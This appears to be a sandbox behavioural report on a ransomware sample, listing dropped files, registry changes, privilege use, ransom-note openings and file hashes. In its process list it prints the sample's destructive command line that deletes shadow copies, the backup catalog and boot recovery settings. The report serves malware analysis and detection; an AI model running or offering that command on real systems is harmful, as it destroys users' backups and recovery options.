File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\discord.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imageUPJZGTwowpsC=msANo=OEVvYUjoFTu.jpg" C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\discord.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Key created \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\discord.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\Ñ:\APEXGO.exe.exe C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\discord.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 2384 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 2384 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1692 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1692 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1692 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 6104 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 6104 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 6104 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 3568 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3568 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3568 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 112 wrote to memory of 5972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 112 wrote to memory of 5972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 112 wrote to memory of 5972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Files

memory/1692-0-0x000000007506E000-0x000000007506F000-memory.dmp

memory/1692-1-0x00000000001B0000-0x00000000001E8000-memory.dmp

memory/1692-2-0x0000000005160000-0x0000000005706000-memory.dmp

memory/1692-3-0x0000000004C90000-0x0000000004D22000-memory.dmp

memory/1692-4-0x0000000075060000-0x0000000075811000-memory.dmp

memory/1692-5-0x00000000050F0000-0x00000000050FA000-memory.dmp

C:\Users\Admin\AppData\Local\discord.exe

MD5 b35a7c0c23349c34d7eaa11be87681b3
SHA1 265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8
SHA256 c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
SHA512 67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

memory/2112-13-0x0000000075060000-0x0000000075811000-memory.dmp

memory/2112-18-0x0000000075060000-0x0000000075811000-memory.dmp

C:\Users\Admin\AppData\Roaming\ID

MD5 14e050f2de3af37d89acacd5952e448f
SHA1 d49aa9fe1054c9742734431fde1e4246277c4e78
SHA256 a80b39dc1f966c74bbaf7aa388b96345914cdfb29a6e8036445a05eb57223989
SHA512 66bc6469cb05ee3d1395e82a94f9573574d9646dc1c83a2ca61171cc6f0fcbb8ffc741ac8f7621dfdf63bca91ef7557c124a645e5bb2b3987a08d3888fd5a9e7

C:\Users\Admin\AppData\Roaming\fondo_antiguo.jpg

MD5 25342190bcc364d32b9e9f9928b5a8a5
SHA1 3ae3bdabaed70dba1fd96c0be72e17aa91c7802a
SHA256 d626e482d44f5fc8eb1c9b2cd08070150ab99afe40cf6dc939015b01b09088f4
SHA512 c0f4f1831f289d4d60e9323e36689c2e0aaa9a7de3dbe4e65b2974d26d3f6f480a7160f5eff2ad458f8b0a7f36057bfba9c7a1b62769091b02640176bd2e53c3

C:\Windows\System32\drivers\etc\hosts

MD5 de941294418545204a4ec21837641098
SHA1 5b6c90046d37841e0096b1f85d021836f2b09639
SHA256 1d7320e6895f426fe4f7bf535b0a63e8308202a6d1a7b790498c45ad5fc58cea
SHA512 fcecb0fee780eda474576afb6fa799fadb5a82d1eb725f93bdcdc4bd7617361f254d03510cbb7f50b1f056e15dd51f56d4a5027e21b4d6289a5e283e0a6b0daf

C:\Users\Admin\Pictures\Camera Roll\APEXNOTE.txt

MD5 bdba72b1177bdfc5dee1d9941fdcae45
SHA1 a7713959c8f0a6d8d7a6169665e87b009ac04b10
SHA256 dd1e78ae51782f025cad303019e331c493d20bc0f7f71c0c186a85be24ee13be
SHA512 3eca03cd090b483beb4e2009a535905ce6ac8100782f46dd681db1e2e25960cd854d303f2820225581b6e25a89925f0199fa022887a5c3c59f53297eb0884b5a

C:\Users\Admin\Music\APEXNOTE.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\usb_maker.bat

MD5 a3746bab405f8aeb6ab31685c0c22c46
SHA1 76e958a8452c71ec5e22b333f31716bee424a17d
SHA256 df54081b8fc400d35da1e013e99592dbe8d2b3dbee289d0d0b5136e9ef555126
SHA512 f541dc434d9d43e3ee2bba29d3c2113a80fbadf734d812b9c0d50ad9b62ca83b3cab8a56db964da9b4a9e031208cd2fd4f86ec8c6a7ff68d6c3e8f26369111c3

memory/1692-300-0x0000000075060000-0x0000000075811000-memory.dmp

memory/2112-301-0x0000000075060000-0x0000000075811000-memory.dmp